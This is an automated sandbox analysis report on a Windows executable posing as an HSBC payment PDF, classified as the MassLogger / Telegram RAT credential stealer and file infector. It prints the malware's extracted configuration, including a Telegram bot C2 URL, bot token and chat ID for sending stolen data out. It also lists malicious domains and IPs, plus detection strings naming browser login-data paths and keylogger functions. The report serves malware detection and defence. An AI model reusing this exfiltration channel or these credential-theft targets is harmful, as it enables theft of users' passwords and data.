Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Sample name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Analysis ID:1572924
MD5:4bd5ab8c1d6eb0d7b601863a74471cf3
SHA1:660bd416b9570b16fa77e2e559989f8efb9fd8b4
SHA256:0b3ad575168e0457905f19bb5304a8ea8cce461d7b1ebd0964d1171374271e47
Tags:exeuser-lowmal3
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 4BD5AB8C1D6EB0D7B601863A74471CF3)
    • RegSvcs.exe (PID: 7188 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • armsvc.exe (PID: 1972 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 9244278F3A4B451378B09E3B314A4B1A)
  • alg.exe (PID: 6292 cmdline: C:\Windows\System32\alg.exe MD5: 2AF371D31DE2620D08F24582BCC94F36)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 5948 cmdline: C:\Windows\system32\AppVClient.exe MD5: FEBB8A1C8444E585D00E9798A241F535)
  • FXSSVC.exe (PID: 5776 cmdline: C:\Windows\system32\fxssvc.exe MD5: B19D2C88C8C42BA1F4C83060C439AAFE)
  • elevation_service.exe (PID: 6968 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AB3EAE016DCC7F0026DB2D4EF2BCCB01)
  • maintenanceservice.exe (PID: 3712 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: E7E89E8BD2CB902CA372DA1022670BE2)
  • msdtc.exe (PID: 2300 cmdline: C:\Windows\System32\msdtc.exe MD5: AAA284FF086F56BEC322CDE13CE5989C)
  • PerceptionSimulationService.exe (PID: 5652 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: F3D51ACFF199999586D8F7FCE77371CB)
  • perfhost.exe (PID: 5448 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: A01D0D18438CEA05470B157B11E94B3F)
  • Locator.exe (PID: 2696 cmdline: C:\Windows\system32\locator.exe MD5: 27C76B862642ACB46AB7DEFBFD73BFA7)
  • snmptrap.exe (PID: 7248 cmdline: C:\Windows\System32\snmptrap.exe MD5: C3DD833FAFF8B6217772A5E66FF25F25)
  • Spectrum.exe (PID: 7280 cmdline: C:\Windows\system32\spectrum.exe MD5: 72181D2F9FF55560F9C4B3AB19C98A62)
  • ssh-agent.exe (PID: 7384 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 2DAADB2D9EE99D7F3C6EB0FA254025A1)
  • TieringEngineService.exe (PID: 7436 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 5E4593411714FE016FDCC665AFE5D552)
  • AgentService.exe (PID: 7480 cmdline: C:\Windows\system32\AgentService.exe MD5: 8311FBEB6995BA81570173720F2B188B)
  • vds.exe (PID: 7504 cmdline: C:\Windows\System32\vds.exe MD5: D2428B28D20D38757D35F80B6491A864)
  • wbengine.exe (PID: 7584 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 7FEABE370E82D30A720E4A9459EFC1EB)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.2.RegSvcs.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              17.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                17.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  17.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf173:$a1: get_encryptedPassword
                  • 0xf49b:$a2: get_encryptedUsername
                  • 0xef0e:$a3: get_timePasswordChanged
                  • 0xf02f:$a4: get_passwordField
                  • 0xf189:$a5: set_encryptedPassword
                  • 0x10ae5:$a7: get_logins
                  • 0x10796:$a8: GetOutlookPasswords
                  • 0x10588:$a9: StartKeylogger
                  • 0x10a35:$a10: KeyLoggerEventArgs
                  • 0x105e5:$a11: KeyLoggerEventArgsEventHandler
                  17.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x13931:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x14729:$a5: \Kometa\User Data\Default\Login Data

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:25.356895+010020516491A Network Trojan was detected192.168.2.5631161.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:15.356321+010020516481A Network Trojan was detected192.168.2.5581301.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:11.604324+010020181411A Network Trojan was detected18.141.10.10780192.168.2.549706TCP
                  2024-12-11T09:26:13.665364+010020181411A Network Trojan was detected54.244.188.17780192.168.2.549708TCP
                  2024-12-11T09:26:15.459262+010020181411A Network Trojan was detected44.221.84.10580192.168.2.549710TCP
                  2024-12-11T09:28:02.892689+010020181411A Network Trojan was detected47.129.31.21280192.168.2.549946TCP
                  2024-12-11T09:28:06.685072+010020181411A Network Trojan was detected13.251.16.15080192.168.2.549952TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:11.604324+010020377711A Network Trojan was detected18.141.10.10780192.168.2.549706TCP
                  2024-12-11T09:26:13.665364+010020377711A Network Trojan was detected54.244.188.17780192.168.2.549708TCP
                  2024-12-11T09:26:15.459262+010020377711A Network Trojan was detected44.221.84.10580192.168.2.549710TCP
                  2024-12-11T09:28:02.892689+010020377711A Network Trojan was detected47.129.31.21280192.168.2.549946TCP
                  2024-12-11T09:28:06.685072+010020377711A Network Trojan was detected13.251.16.15080192.168.2.549952TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:24.482915+010020577441Malware Command and Control Activity Detected192.168.2.549716149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:14.947022+010028032742Potentially Bad Traffic192.168.2.549709193.122.6.16880TCP
                  2024-12-11T09:26:22.321994+010028032742Potentially Bad Traffic192.168.2.549709193.122.6.16880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T09:26:12.597628+010028508511Malware Command and Control Activity Detected192.168.2.54970718.141.10.10780TCP
                  2024-12-11T09:27:14.774279+010028508511Malware Command and Control Activity Detected192.168.2.54979282.112.184.19780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://ww12.przvgke.biz/dAvira URL Cloud: Label: malware
                  Source: http://ww99.przvgke.biz/Avira URL Cloud: Label: malware
                  Source: http://ww99.przvgke.biz/iwsxaAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/TAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizcAvira URL Cloud: Label: malware
                  Source: http://ww99.przvgke.biz/7YcsAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662Avira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/LAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334Avira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNmAvira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/Avira URL Cloud: Label: malware
                  Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMwAvira URL Cloud: Label: malware
                  Source: http://ww99.przvgke.biz/snsobwmcccpnrmAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Found malware configuration
                  Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
                  Source: RegSvcs.exe.7188.17.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}
                  Multi AV Scanner detection for domain / URL
                  Source: ww99.przvgke.bizVirustotal: Detection: 14%Perma Link
                  Source: ww12.przvgke.bizVirustotal: Detection: 15%Perma Link
                  Source: http://82.112.184.197/dtxqcrVirustotal: Detection: 7%Perma Link
                  Source: http://ww99.przvgke.biz/Virustotal: Detection: 14%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 81%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49711 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2086108472.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2752944909.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
                  Source: Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2804279268.0000000000840000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: wbengine.exe.2.dr
                  Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
